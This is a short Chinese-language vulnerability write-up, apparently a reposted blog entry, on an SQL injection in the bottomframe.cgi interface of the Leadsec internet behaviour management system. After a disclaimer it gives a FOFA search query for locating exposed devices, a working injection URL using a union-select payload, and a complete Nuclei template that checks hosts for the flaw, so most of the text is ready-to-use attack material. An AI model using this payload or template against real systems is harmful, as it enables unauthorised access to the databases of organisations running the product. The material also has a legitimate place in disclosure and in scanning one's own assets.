网御星云-上网行为管理系统bottomframe.cgi接口存在SQL注入

一、免责声明:

本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:

网御星云-上网行为管理系统bottomframe.cgi接口存在SQL注入_第1张图片

三、资产梳理:

app="网御星云-上网行为管理系统"

四、漏洞复现:

http://xxx.xxx.xxx/bottomframe.cgi?user_name=%27))%20union%20select%20database()%23

网御星云-上网行为管理系统bottomframe.cgi接口存在SQL注入_第2张图片

五、POC:

网御星云-上网行为管理系统bottomframe.cgi接口存在SQL注入_第3张图片

id: Leadsec_ACM_sql
info:
  name: Leadsec_ACM_sql
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/bottomframe.cgi?user_name=%27))%20union%20select%20database()%23
  metadata:
    max-request: 1
    fofa-query: app="网御星云-上网行为管理系统"
    verified: true
  tags: Leadsec_ACM

requests:
  - raw:
      - |-
        GET /bottomframe.cgi?user_name=%27))%20union%20select%20database()%23 HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body), "NTC") && status_code == 200' 

你可能感兴趣的:(漏洞复现,sql,数据库,网络安全,安全性测试)